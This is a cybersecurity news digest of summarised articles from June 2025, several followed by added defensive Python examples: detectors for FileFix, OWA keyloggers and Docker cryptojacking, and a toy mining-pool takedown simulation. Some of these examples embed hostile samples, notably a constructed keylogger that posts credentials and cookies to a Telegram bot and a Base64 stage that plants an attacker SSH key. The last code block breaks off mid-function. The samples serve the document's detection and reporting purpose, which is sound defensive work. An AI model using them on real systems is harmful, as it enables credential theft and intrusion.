Daily Brief

Find articles below; the summaries are machine-generated

Total articles found: 11813

Checks for new stories every ~15 minutes

2025-06-24 21:09:25 theregister CYBERCRIME Citrix Faces Severe Security Threat, Urges Immediate Patches
Citrix has patched a critical vulnerability in NetScaler ADC and NetScaler Gateway that security researcher Kevin Beaumont has dubbed "CitrixBleed 2" because of its resemblance to the original CitrixBleed flaw (CVE-2023-4966), which was exploited in major ransomware intrusions. The new bug, tracked as CVE-2025-5777 with a CVSS score of 9.3, is an out-of-bounds memory read caused by insufficient input validation: an unauthenticated remote attacker can read session tokens and other sensitive data from appliance memory, and a replayed session token hijacks an already authenticated session, which is what makes it a multi-factor authentication bypass. It applies to appliances configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server, the deployment pattern typical of large organizations. Versions 12.1 and 13.0 are end-of-life and will not be fixed; customers on those branches must upgrade to a supported release that contains the patch. Citrix advises updating immediately and then terminating all active ICA and PCoIP sessions (kill icaconnection -all and kill pcoipConnection -all) so that any tokens captured before the update cannot be replayed. No in-the-wild exploitation has been confirmed yet, but Beaumont and watchTowr's Benjamin Harris consider it only a matter of time given the bug's severity and its similarity to CitrixBleed. Changes to the National Vulnerability Database entry concerning exposure of the management interface also point to a higher risk than first presented. Organizations are urged to treat this as an incident in progress rather than a routine patch cycle.
2025-06-24 20:41:12 bleepingcomputer MALWARE Trojanized SonicWall VPN Client Steals User Credentials
SonicWall has warned that a trojanized version of its NetExtender SSL VPN client is being distributed to steal VPN credentials. The fake installer masquerades as NetExtender 10.3.2.27 and is hosted on a site built to look like SonicWall's own. It is not signed by SonicWall; instead it carries a code-signing certificate issued to "CITYLIGHT MEDIA PRIVATE LIMITED", which is enough to pass checks that only look for the presence of a valid signature rather than for the expected publisher. Two binaries were modified: NeService.exe was patched to skip the digital-certificate validation that would otherwise reject tampered components, and NetExtender.exe was given code that, when the user clicks Connect, sends the VPN configuration (username, password and domain) to a remote server. SonicWall says its own security products and Microsoft Defender now block the installer, advises downloading software only from its official websites, and recommends avoiding software offered through promotional links and scanning downloads with up-to-date antivirus before installation.
2025-06-24 18:55:21 thehackernews MISCELLANEOUS U.S. Visa Rules Now Require Public Social Media Profiles
The U.S. Embassy in India announced new visa application guidelines requiring applicants to make their social media accounts public. The directive affects F, M, and J nonimmigrant visa categories, which include students and exchange visitors. Making social media profiles public is intended to assist in the vetting process for establishing identity and eligibility of applicants. Refusal to adjust privacy settings to public could lead to visa application rejection. This change is part of broader measures to ensure national security during the visa vetting process. Social media identifiers have been a required part of U.S. visa applications since 2019. The U.S. Department of State emphasizes the need to protect national interests and ensure applicants do not pose security threats. Other U.S. embassies worldwide have issued similar directives, including the necessity to provide historical social media usernames.
2025-06-24 17:27:38 theregister MALWARE Alert: Fake SonicWall VPN App Steals Sensitive User Credentials
SonicWall and Microsoft have identified a fake SonicWall SSL VPN installer that steals user credentials: a trojanized build of the official NetExtender client. The installer is digitally signed, but with a legitimate certificate issued to an unrelated company, "CITYLIGHT MEDIA PRIVATE LIMITED", rather than to SonicWall, which is enough to lend it credibility at a glance. Victims reached it through spoofed download sites imitating SonicWall's portals. Two files were modified: NeService.exe, patched so that the client's own certificate-validation checks accept the tampered components, and NetExtender.exe, which collects the VPN configuration (username, password and domain) and sends it to an attacker-controlled server. The spoofed sites have been taken down and the certificate revoked, but the threat persists because registering new domains is trivial. SonicWall's advice is to download software only from official vendor sites; verifying that the signer on an installer is actually SonicWall, not merely that a signature is present, is the check that distinguishes this installer from the real one.
2025-06-24 16:59:16 bleepingcomputer CYBERCRIME Trezor Support System Exploited in Crypto Phishing Scam
Trezor's automated support system is being abused to deliver phishing emails from a legitimate Trezor address. Attackers submit Trezor's contact form with the phishing lure as the ticket title and the victim's email address as the requester; the system's automatic acknowledgement then emails the victim, with the lure in the subject line, from Trezor's real support address, so the message passes the usual sender checks. The lure sends victims to a fake site that asks for their wallet seed phrase, and whoever holds the seed phrase has full control of the wallet's funds. Trezor has reminded users never to share their seed phrase or enter it anywhere other than on the device itself, and says it is working on measures to stop the form being abused. This follows earlier breaches and phishing waves against Trezor users; Trezor's online guide covers the current situation and anti-phishing advice.
2025-06-24 15:10:33 theregister MISCELLANEOUS Discovering the Hidden Gaps in Vulnerability Management
Organizations routinely overestimate the completeness of their vulnerability scanning; in the experience reported here, 10 to 20 per cent of devices are never scanned at all. Vulnerability management platforms report clean metrics because they measure only the assets they already know about, so asset-visibility gaps never appear in the dashboards. Even discovered devices can be only partially assessed when an agent is missing or credentials fail, leaving an unauthenticated scan that cannot see most local vulnerabilities. Most platforms have no native way to list devices that have never been scanned, which is exactly the population that matters. The case studies cited, including unpatched systems that led to breaches in financial and healthcare organizations, turn on such gaps. The recommended fix is continuous inventory reconciliation: cross-reference the scanner's asset list against other systems of record, and treat every host present elsewhere but absent from the scanner as an open finding. The article argues for replacing reliance on platform-native reports with continuous validation and monitoring of asset inventories, and Prelude Security's position is that organizations should not depend on vendor reports but proactively find and close visibility gaps.
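The reconciliation described above, as an added example that is not part of the article or of Prelude Security's product: three constructed inventory exports (a CMDB, an EDR console and the scanner's own asset list, with field names assumed for the demo) are normalised and cross-referenced to list hosts that were never scanned, hosts whose last scan is stale, hosts that only ever got an unauthenticated scan, and hosts the EDR knows about but the CMDB does not.

```python
"""Cross-check asset inventories to find never-scanned and stale-scanned hosts.

Added example, not code from the article. All three inventories are constructed;
their field names are assumptions for the demo.
"""
from datetime import datetime, timedelta
import ipaddress

# Constructed sample exports. Note the deliberate inconsistencies (case, FQDN vs
# short name, trailing whitespace) that defeat naive string joins on real exports.
CMDB = [
    {"hostname": "WEB-01.corp.example", "ip": "10.0.1.10"},
    {"hostname": "db-02.corp.example", "ip": "10.0.1.20"},
    {"hostname": "hr-fs-01", "ip": "10.0.2.5"},
    {"hostname": "legacy-ivr", "ip": "10.0.9.9"},
]
EDR = [
    {"host": "web-01", "ip": "10.0.1.10"},
    {"host": "DB-02 ", "ip": "10.0.1.20"},
    {"host": "jump-03", "ip": "10.0.3.3"},  # known to EDR, absent from the CMDB
]
SCANNER = [
    # last_scan: last completed assessment; auth: credentialed/agent scan or not
    {"asset": "web-01.corp.example", "ip": "10.0.1.10", "last_scan": "2025-06-20", "auth": True},
    {"asset": "db-02", "ip": "10.0.1.20", "last_scan": "2025-03-01", "auth": False},
    {"asset": "jump-03", "ip": "10.0.3.3", "last_scan": "2025-06-22", "auth": True},
]


def norm_host(name: str) -> str:
    """Normalise hostnames: strip whitespace, lower-case, drop the domain suffix."""
    return name.strip().lower().split(".")[0]


def norm_ip(ip: str) -> str:
    return str(ipaddress.ip_address(ip.strip()))


def asset_keys(record, host_field, ip_field):
    """Both keys, so that a match on either hostname or IP address counts."""
    return {("host", norm_host(record[host_field])), ("ip", norm_ip(record[ip_field]))}


def coverage_report(cmdb, edr, scanner, as_of="2025-06-24", max_age_days=30):
    """Return gap categories -> sorted canonical host names, plus a coverage percentage.

    never_scanned   : in at least one inventory, absent from the scanner
    stale           : scanned, but not within max_age_days of as_of
    unauthenticated : last scan was not credentialed/agent-based (incomplete)
    shadow          : seen by EDR but missing from the CMDB (inventory drift)
    """
    as_of_dt = datetime.strptime(as_of, "%Y-%m-%d")
    known = {}  # (kind, value) -> canonical host name
    for r in cmdb:
        for k in asset_keys(r, "hostname", "ip"):
            known.setdefault(k, norm_host(r["hostname"]))
    cmdb_hosts = set(known.values())
    for r in edr:
        for k in asset_keys(r, "host", "ip"):
            known.setdefault(k, norm_host(r["host"]))

    scanned = {}  # canonical host -> scanner record
    for r in scanner:
        for k in asset_keys(r, "asset", "ip"):
            if k in known:
                scanned[known[k]] = r
    all_hosts = set(known.values())
    never = all_hosts - set(scanned)
    stale, unauth = set(), set()
    for host, r in scanned.items():
        age = as_of_dt - datetime.strptime(r["last_scan"], "%Y-%m-%d")
        if age > timedelta(days=max_age_days):
            stale.add(host)
        if not r["auth"]:
            unauth.add(host)
    shadow = {norm_host(r["host"]) for r in edr} - cmdb_hosts
    return {
        "never_scanned": sorted(never),
        "stale": sorted(stale),
        "unauthenticated": sorted(unauth),
        "shadow": sorted(shadow),
        "coverage_pct": round(100 * len(scanned) / len(all_hosts), 1),
    }


if __name__ == "__main__":
    for k, v in coverage_report(CMDB, EDR, SCANNER).items():
        print(f"{k:16} {v}")
```

Hosts that land in never_scanned are the ones a platform-native report cannot show you, because the platform has never heard of them; stale and unauthenticated are the "scanned but not really assessed" cases. Keying on both hostname and IP avoids the false "never scanned" results that name-only joins produce when one source exports FQDNs and another exports short names.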
2025-06-24 15:00:32 bleepingcomputer MALWARE New FileFix Attack Exploits Windows File Explorer Stealthily
Security researcher mr.d0x has published FileFix, a variant of the ClickFix social-engineering technique that uses the Windows File Explorer address bar, rather than the Run dialog or a terminal, to get the victim to execute a command. ClickFix tricks users into pasting a PowerShell command that the phishing page has placed on the clipboard. FileFix wraps the same trick in a more familiar workflow: the phishing page claims a file has been shared, offers an "Open File Explorer" button that opens the browser's file-upload dialog, and instructs the user to paste the "file path" into that dialog's address bar. The clipboard actually holds a PowerShell command, padded with spaces and followed by a # comment containing a plausible file path, so that only the path is visible in the address bar; pressing Enter runs the command. Because nothing on screen resembles a terminal and the File Explorer dialog is a trusted part of Windows, users are more likely to comply, and the technique is simple enough to serve for malware and ransomware delivery or targeted phishing. mr.d0x expects FileFix to be adopted quickly, as his earlier techniques were, and demonstrated a working proof of concept to BleepingComputer. One detail worth noting for defenders: the upload dialog is hosted by the browser process, so the shell it spawns has the browser as its parent, a parent-child pair that rarely occurs legitimately.
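A detection sketch for the pattern described above, added here as an example; it is not mr.d0x's proof of concept and not code from the article. The events are constructed in a Sysmon Event ID 1-like shape, and the browser list, the scoring weights and the alert threshold are assumptions. The signal comes from two things the technique cannot avoid: a shell spawned by a browser (or, for the plain Explorer address bar, by explorer.exe) and a command line that ends in a '#'-commented fake file path, usually after a run of padding spaces.

```python
"""Hunt for FileFix-style command execution in process-creation telemetry.

Added example, not mr.d0x's PoC and not code from the article. Events below are
constructed; field names, browser list, weights and threshold are assumptions.
"""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# A '#' comment followed by a Windows path: the visible tail of the pasted
# "file path" that hides the real command in front of it.
DISGUISE_RE = re.compile(r"#\s*(?:[A-Za-z]:\\|\\\\)[^\s]*")
# A long whitespace run pushes the command out of the address bar's visible area.
PADDING_RE = re.compile(r"\s{8,}")

# Constructed events (paths and command lines made up for the demo)
EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "ping example.com"                   # C:\company\internal-secure\filedrive\HRPolicy.docx'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo hi # \\fileserver\share\Q2-report.xlsx"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},  # benign admin use
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n C:\docs\notes.docx'},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons). Higher is more suspicious; >= 2 is worth an alert."""
    parent, child, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    score, reasons = 0, []
    if child not in SHELLS:
        return 0, reasons
    if parent in BROWSERS:
        # The browser's file-upload dialog hosts the Explorer address bar, so the
        # shell is a child of the browser process (assumption: parentage is preserved).
        score += 2
        reasons.append(f"{child} spawned by browser {parent}")
    elif parent == "explorer.exe":
        score += 1
        reasons.append(f"{child} spawned from Explorer")
    if DISGUISE_RE.search(cmd):
        score += 2
        reasons.append("command line ends in a '#'-commented fake file path")
    if PADDING_RE.search(cmd):
        score += 1
        reasons.append("long whitespace padding in command line")
    return score, reasons


def find_filefix(events, threshold=2):
    """Return (index, score, reasons) for every event at or above the alert threshold."""
    hits = []
    for i, ev in enumerate(events):
        s, why = score_event(ev)
        if s >= threshold:
            hits.append((i, s, why))
    return hits


if __name__ == "__main__":
    for i, s, why in find_filefix(EVENTS):
        print(f"event {i}: score {s}")
        for r in why:
            print("   -", r)
```

The benign admin PowerShell launch (event 2) scores 1 and stays below the threshold on parentage alone; only the comment-disguise or browser-parent signals push an event over it. Real deployments would feed this from the SIEM's process-creation table rather than a static list, and would tune the browser and shell sets to the estate.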
2025-06-24 14:21:18 thehackernews CYBERCRIME Innovative Techniques to Disrupt Cryptocurrency Mining Botnets
Akamai researchers have described two techniques for disrupting cryptomining botnets that turn the Stratum mining protocol and pool ban policies against the botnet. Both rely on the fact that a pool enforces policy on the identity it can see: the connecting IP address and the wallet being mined to. The first, "bad shares", targets botnets that route their miners through a mining proxy: a defender who can reach the proxy submits invalid shares through it, and the pool, seeing a stream of bad work from the proxy's IP, bans that IP, which cuts off every bot behind it. The second targets miners that connect to the pool directly with the operator's wallet: the defender opens more than 1,000 login connections using that wallet address, which triggers a temporary one-hour wallet ban at the pool and stops all bots mining to it, and the flood can be repeated to keep the wallet banned. The work focuses on Monero, whose pools are the usual choice for botnets, but the approach carries over to other currencies whose pools speak Stratum and apply similar bans. The asymmetry favours defenders: a legitimate miner caught by such a ban recovers by changing IP or wallet on a single machine, whereas a botnet operator would have to push a new proxy or wallet to every infected host.
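Both takedowns rely on pool-side policy, so the clearest way to see them is a toy pool that implements the two bans and a miner that speaks Stratum-style JSON-RPC to it. The block below is an added example, not Akamai's code (their released tool is XMRogue) and not a real pool: the thresholds, the proxy topology and the wallet string are a constructed model, and share validation is a placeholder for a real hash-target check. The login and submit messages follow the shape XMRig-style Monero clients send.

```python
"""Toy Stratum pool with the two ban policies Akamai's techniques rely on.

Added example: not Akamai's code and not a real pool. Thresholds, topology and
the wallet string are constructed; share validation is a stand-in.
"""
import json

BAD_SHARE_LIMIT = 5          # assumption: pool bans an IP after this many invalid shares
LOGIN_FLOOD_LIMIT = 1000     # from the article: >1,000 logins gets the wallet banned
WALLET_BAN_SECONDS = 3600    # ... for one hour
BOT_WALLET = "4BOTNETWALLETPLACEHOLDER"   # constructed, not a real address


class ToyPool:
    def __init__(self):
        self.banned_ips = set()
        self.wallet_logins = {}      # wallet -> logins in the current window
        self.wallet_ban_until = {}   # wallet -> unix time the ban lifts
        self.bad_shares = {}         # ip -> invalid shares seen
        self.sessions = {}           # session id -> (ip, wallet)
        self._next = 0

    def handle(self, ip, now, raw):
        """Process one Stratum JSON-RPC request arriving from `ip`; return the JSON reply."""
        msg = json.loads(raw)
        if ip in self.banned_ips:
            return self._err(msg, "IP banned")
        if msg["method"] == "login":
            wallet = msg["params"]["login"]
            if self.wallet_ban_until.get(wallet, 0) > now:
                return self._err(msg, "wallet temporarily banned")
            self.wallet_logins[wallet] = self.wallet_logins.get(wallet, 0) + 1
            if self.wallet_logins[wallet] > LOGIN_FLOOD_LIMIT:
                self.wallet_ban_until[wallet] = now + WALLET_BAN_SECONDS
                self.wallet_logins[wallet] = 0          # fresh counting window after the ban
                return self._err(msg, "wallet temporarily banned")
            self._next += 1
            sid = f"sess-{self._next}"
            self.sessions[sid] = (ip, wallet)
            return json.dumps({"id": msg["id"], "jsonrpc": "2.0", "result": {
                "id": sid, "job": {"job_id": "j1", "target": "ffff0000"}, "status": "OK"}})
        if msg["method"] == "submit":
            valid = msg["params"]["result"].startswith("0000")   # toy target check (assumption)
            if not valid:
                self.bad_shares[ip] = self.bad_shares.get(ip, 0) + 1
                if self.bad_shares[ip] >= BAD_SHARE_LIMIT:
                    self.banned_ips.add(ip)
                return self._err(msg, "invalid share")
            return json.dumps({"id": msg["id"], "jsonrpc": "2.0", "result": {"status": "OK"}})
        return self._err(msg, "unknown method")

    @staticmethod
    def _err(msg, text):
        return json.dumps({"id": msg.get("id"), "jsonrpc": "2.0",
                           "error": {"code": -1, "message": text}})


# Miner-side messages in the shape XMRig-style Monero clients send.
def login(wallet):
    return json.dumps({"id": 1, "jsonrpc": "2.0", "method": "login",
                       "params": {"login": wallet, "pass": "x", "agent": "xmrig/6.22"}})


def submit(sid, result):
    return json.dumps({"id": 2, "jsonrpc": "2.0", "method": "submit",
                       "params": {"id": sid, "job_id": "j1", "nonce": "deadbeef", "result": result}})


def ok(reply):
    return "error" not in json.loads(reply)


def bad_shares_takedown():
    """Topology 1: bots -> mining proxy -> pool. The pool only ever sees the proxy's IP,
    so invalid shares pushed through the proxy get the proxy (and every bot behind it) banned."""
    pool, proxy_ip = ToyPool(), "203.0.113.7"
    bots = [json.loads(pool.handle(proxy_ip, 0, login(BOT_WALLET)))["result"]["id"] for _ in range(3)]
    before = [ok(pool.handle(proxy_ip, 1, submit(b, "0000aa"))) for b in bots]   # mining works
    for _ in range(BAD_SHARE_LIMIT):                                             # defender's bad shares
        pool.handle(proxy_ip, 2, submit(bots[0], "ffff00"))
    after = [ok(pool.handle(proxy_ip, 3, submit(b, "0000bb"))) for b in bots]    # everyone rejected
    return before, after


def login_flood_takedown():
    """Topology 2: bots connect straight to the pool with the operator's wallet. Flooding
    logins with that wallet bans the wallet itself, which hits every bot mining to it."""
    pool = ToyPool()
    for i in range(LOGIN_FLOOD_LIMIT + 1):
        pool.handle(f"198.51.100.{i % 200}", 0, login(BOT_WALLET))
    during = ok(pool.handle("192.0.2.50", 10, login(BOT_WALLET)))                      # real bot, banned
    after = ok(pool.handle("192.0.2.50", WALLET_BAN_SECONDS + 10, login(BOT_WALLET)))  # ban has lapsed
    return during, after


if __name__ == "__main__":
    print("bad shares:", bad_shares_takedown())
    print("login flood:", login_flood_takedown())
```

The second function also shows why the wallet ban is only a temporary measure: once the hour lapses the wallet logs in again, so a defender has to keep the flood going, while the bad-shares ban persists until the pool lifts it or the botnet operator moves to a new proxy address.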
2025-06-24 14:08:29 bleepingcomputer MISCELLANEOUS Continuous Penetration Testing: Revolutionizing Proactive Security
This vendor-authored piece from Sprocket Security compares penetration testing models: point-in-time pentests, pentest-as-a-service (PTaaS), bug bounty programs, automated tools and continuous penetration testing (CPT), and argues that CPT is the most effective. Its case is that a periodic pentest is a snapshot that goes stale as code, infrastructure and threats change, whereas CPT provides always-on, real-world attack simulation that combines human testers with automation, giving continuous coverage, real-time alerts, unlimited retesting and faster remediation, which matters when newly disclosed vulnerabilities are weaponized within days. The higher upfront cost is presented as justified by closer alignment with modern continuous-delivery practices and a persistent threat landscape. The conclusion is that moving from annual or periodic testing to a continuous model lets organizations stay ahead of attackers and protect sensitive data more effectively; Sprocket offers these services and frames the change in strategic, operational and cost terms.
2025-06-24 13:45:40 bleepingcomputer MISCELLANEOUS U.S. House Bans WhatsApp on Government-Issued Devices
The U.S. House of Representatives has banned WhatsApp on all House-issued devices used by congressional staff, citing concerns about the app's data-protection practices, including the lack of encryption of stored data and limited transparency about how data is handled. Staff may still use WhatsApp on personal devices, but those devices are not permitted in secure areas such as classified briefings or secure facilities. The ban covers mobile phones, laptops and desktops, and extends to WhatsApp's web client in browsers on those devices. House Chief Administrative Officer Catherine Szpindor said the priority is protecting the House and its members from cyber threats. The CAO's recommended alternatives are Microsoft Teams, Wickr, Signal, iMessage and FaceTime, which it considers acceptable for official communications. WhatsApp objected strongly, arguing that its default end-to-end encryption offers better security than many apps on the approved list. The move is part of a wider House effort to restrict risky platforms, which has previously covered ByteDance apps such as TikTok and AI tools such as ChatGPT.
2025-06-24 13:29:11 thehackernews CYBERCRIME Global Microsoft Exchange Servers Hacked to Harvest Login Details
Unidentified attackers are compromising Microsoft Exchange servers worldwide and injecting JavaScript keyloggers into the Outlook Web Access login page to harvest credentials. Positive Technologies identified two families of keylogger code on servers in 26 countries, across government, finance, IT and education among other sectors. The campaign, first documented in May 2024, gains access through known Exchange vulnerabilities such as ProxyShell and then modifies the logon page so that usernames, passwords and cookies are captured as users sign in. Exfiltration is kept quiet: one variant writes the stolen data to a local file on the server that the attacker later retrieves over the internet, the other sends it out through external channels such as Telegram bots. First seen in Africa and the Middle East, the activity has since spread worldwide, with notable concentrations in Vietnam, Russia, Taiwan and China. The researchers warn that many Exchange servers remain unpatched against years-old vulnerabilities, which lets the attackers stay resident for long periods; 22 of the compromised servers belong to government bodies. Comparing the deployed OWA logon page (logon.aspx) with a known-good copy is the quickest way to spot this class of implant.
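A scanner for the implant class described above, added as an example; it is not Positive Technologies' detection logic and not code from the article. The logon.aspx fragment is constructed (one legitimate script block and one injected keylogger that posts the form fields to a Telegram bot), and the OWA field IDs, the host allow-list and the indicator patterns are assumptions. It flags a script block only when it both reads the credential fields and shows an exfiltration sign, and it also offers the simpler hash-against-baseline check.

```python
"""Scan an Exchange OWA logon page (logon.aspx) for injected credential-stealing scripts.

Added example, not Positive Technologies' detection logic. The page fragment is
constructed; field IDs, host allow-list and indicator patterns are assumptions.
"""
import hashlib
import re
from html.parser import HTMLParser

# Constructed logon.aspx excerpt: a legitimate script plus an injected keylogger that
# grabs the form fields on submit and sends them, with cookies, to a Telegram bot.
SAMPLE_LOGON_ASPX = """
<html><body>
<form id="logonForm" action="/owa/auth.owa" method="post">
  <input id="username" name="username"><input id="password" name="password" type="password">
  <input type="submit" id="signInButton">
</form>
<script type="text/javascript">
  function clkLgn(){ if(gbid("rdoPblc").checked){ /* legitimate page logic */ } }
</script>
<script>
  document.getElementById("logonForm").addEventListener("submit", function(){
    var u = document.getElementById("username").value,
        p = document.getElementById("password").value;
    var x = new XMLHttpRequest();
    x.open("GET", "https://api.telegram.org/bot123456789:AAExampleTokenPlaceholder0000000000/sendMessage?chat_id=1&text="
           + encodeURIComponent(u + ":" + p + ":" + document.cookie), true);
    x.send();
  });
</script>
</body></html>
"""

CRED_FIELDS = re.compile(
    r'(?:getElementById|querySelector)\(["\'](?:username|password)["\']\)|document\.cookie', re.I)
EXFIL = [
    ("telegram-bot-api", re.compile(r"api\.telegram\.org/bot\d+:[\w-]{20,}", re.I)),
    ("external-url", re.compile(r"https?://(?!(?:localhost|127\.0\.0\.1)\b)[\w.-]+", re.I)),
    ("network-call", re.compile(r"XMLHttpRequest|fetch\(|navigator\.sendBeacon|new Image\(", re.I)),
    ("file-write", re.compile(r"\.(?:txt|log|dat)\b", re.I)),  # local-file variant drops creds on disk
]
ALLOWED_HOSTS = {"www.w3.org", "schemas.microsoft.com"}  # assumption: hosts the page may reference


class ScriptExtractor(HTMLParser):
    """Collect the body of every <script> block (HTMLParser hands script text to handle_data)."""
    def __init__(self):
        super().__init__()
        self.in_script, self.buf, self.scripts = False, [], []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script, self.buf = True, []

    def handle_data(self, data):
        if self.in_script:
            self.buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
            self.scripts.append("".join(self.buf))


def scan_logon_page(html: str):
    """One finding per script block that reads credentials AND shows an exfiltration sign."""
    p = ScriptExtractor()
    p.feed(html)
    findings = []
    for idx, js in enumerate(p.scripts):
        reads_creds = bool(CRED_FIELDS.search(js))
        hits = []
        for name, rx in EXFIL:
            for m in rx.finditer(js):
                if name == "external-url":
                    host = m.group(0).split("//", 1)[1]
                    if host.lower() in ALLOWED_HOSTS:
                        continue
                hits.append(name)
                break
        if reads_creds and hits:
            findings.append({"script_index": idx, "indicators": hits,
                             "sha256": hashlib.sha256(js.encode()).hexdigest()[:16]})
    return findings


def differs_from_baseline(html: str, baseline_sha256: str) -> bool:
    """Cheaper check: compare the deployed file against the hash of a known-good copy
    taken right after the last cumulative update (baseline_sha256 is an assumed stored value)."""
    return hashlib.sha256(html.encode()).hexdigest() != baseline_sha256


if __name__ == "__main__":
    for f in scan_logon_page(SAMPLE_LOGON_ASPX):
        print(f)
```

The pattern scan is useful on a server whose baseline was never recorded; where a baseline exists, any hash mismatch on logon.aspx after patching is already an incident, and the content scan then tells you which variant you are looking at and where the data went.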
2025-06-24 11:50:45 theregister CYBERCRIME Four REvil Ransomware Members Released After Guilty Pleas
Four members of the REvil ransomware group have been released from Russian custody after most of their five-year sentences was offset by time already spent in pre-trial detention following their arrest in January 2022. The four had pleaded guilty to charges including use of malicious programs and illegal circulation of means of payment, and had complied with court orders including forfeiture of assets such as BMWs and a large sum of money. Four other defendants who did not plead guilty were sentenced in 2024 to between 4.5 and six years and remain imprisoned, an outcome that turns largely on the plea decisions. REvil, responsible for high-profile attacks including on a US nuclear weapons contractor and many international businesses, was effectively dismantled after a US-led operation with the FBI took its infrastructure offline in 2021, followed by the FSB arrests in 2022. Russia does not extradite its own citizens, so US prosecutions of REvil members have been limited to those arrested elsewhere, most notably the Ukrainian affiliate extradited to and sentenced in the United States. The case illustrates how outcomes in cybercrime prosecutions depend as much on jurisdiction and geopolitics as on the crimes themselves.
2025-06-24 11:03:29 thehackernews MISCELLANEOUS Expert Insights on Implementing Continuous Threat Exposure Management
At the Xposure Summit 2025, security leaders from several sectors discussed what it takes to put Continuous Threat Exposure Management (CTEM) into practice. The starting point they recommend is an asset inventory and identity management, followed by frequent validation of both internal and external-facing assets, since environments change faster than periodic reviews can track. Getting traction with boards and regulators requires translating security findings into risk-management language. Success is measured not by vulnerability counts but by the reduction in exploitable attack paths and by how clearly risk is conveyed to leadership. The panel drew the line between traditional vulnerability management and CTEM at validation: CTEM tests whether defenses actually stop real-world attack techniques rather than stopping at patching. Threat intelligence is the backbone of such testing, supplying the adversary tactics, techniques and procedures (TTPs) to emulate. The suggested cadence is to validate internal assets weekly and external-facing ones daily, so that control over the environment is maintained continuously rather than reassessed once a year.
2025-06-24 09:57:37 thehackernews CYBERCRIME Hackers Use Misconfigured Docker APIs for Cryptocurrency Mining
Attackers are scanning for misconfigured Docker Engine APIs exposed to the internet and using them to create containers on the victim host and deploy cryptocurrency miners, with Tor hiding the command-and-control traffic. The intrusion starts by querying the exposed API to list containers and then create a new one from the public "alpine" image with host directories bind-mounted into it, which gives the container write access to the host filesystem. The container's command runs a Base64-encoded shell script that installs Tor and fetches further scripts from a .onion address. Through the host mount the attackers then modify the SSH configuration and add their own key to authorized_keys for persistent, direct access to the host. They also install masscan, libpcap, zstd and torsocks for scanning and Tor-routed communication with their C&C server. The final payload is the XMRig miner with a preset configuration and wallet addresses. Trend Micro, which reported the activity, notes that victims are concentrated in technology, finance and healthcare and that the campaign fits a continuing pattern of cloud misconfigurations being turned into cryptojacking. The root cause is a Docker daemon listening on its TCP port (2375 by default) without TLS client authentication; the API should stay on the local Unix socket or be protected with mutual TLS, and any container with the host root bind-mounted deserves immediate attention.
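An audit for the container pattern described above, added as an example; it is not Trend Micro's code and not from the article. The inspect records are constructed in the shape returned by `docker inspect` (GET /containers/{id}/json), and the sensitive-path list and keyword patterns are assumptions. It flags host paths bind-mounted into a container, privileged and host-PID containers, and suspicious command content, decoding any `echo <base64> | base64 -d` stage so that the inner script is inspected too.

```python
"""Audit Docker inspect output for the abuse pattern in the Trend Micro report: an
'alpine' container with the host filesystem bind-mounted and a Base64-decoded bootstrap.

Added example, not Trend Micro's code. The inspect records are constructed; in
practice they come from `docker inspect` or GET /containers/{id}/json. Path and
keyword lists are assumptions.
"""
import base64
import re

SENSITIVE_HOST_PATHS = ("/", "/root", "/etc", "/var/run/docker.sock", "/home", "/proc", "/sys")
SUSPECT_CMD = re.compile(
    r"base64\s+(-d|--decode)|chroot\s+/|\.onion\b|\btor(socks)?\b|xmrig|authorized_keys|masscan", re.I)

# Constructed bootstrap, encoded the way the report describes (not the real script).
_STAGE1 = ("apk add tor torsocks && mkdir -p /hostroot/root/.ssh && "
           "echo 'ssh-ed25519 AAAA... attacker' >> /hostroot/root/.ssh/authorized_keys")
CONTAINERS = [
    {"Id": "a1b2c3", "Name": "/sharp_turing",
     "Config": {"Image": "alpine",
                "Cmd": ["sh", "-c", f"echo {base64.b64encode(_STAGE1.encode()).decode()} | base64 -d | sh"]},
     "HostConfig": {"Binds": ["/:/hostroot"], "Privileged": False, "PidMode": ""}},
    {"Id": "d4e5f6", "Name": "/web",
     "Config": {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False, "PidMode": ""}},
    {"Id": "0a0b0c", "Name": "/agent",
     "Config": {"Image": "alpine", "Cmd": ["sh"]},
     "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"], "Privileged": True,
                    "PidMode": "host"}},
]


def host_path_is_sensitive(src: str) -> bool:
    """True if the bind source is a sensitive host path or lives underneath one."""
    src = src.rstrip("/") or "/"
    return any(src == p or (p != "/" and src.startswith(p + "/")) for p in SENSITIVE_HOST_PATHS)


def decode_inline_base64(cmd: str) -> str:
    """Decode blobs piped into `base64 -d` so the inner script can be inspected as text."""
    out = []
    for blob in re.findall(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|", cmd):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            continue
    return "\n".join(out)


def audit_container(c: dict) -> list[str]:
    findings = []
    hc, cfg = c.get("HostConfig", {}), c.get("Config", {})
    for bind in hc.get("Binds") or []:
        src = bind.split(":")[0]
        if host_path_is_sensitive(src):
            findings.append(f"host path {src} mounted into container")
    if hc.get("Privileged"):
        findings.append("privileged container")
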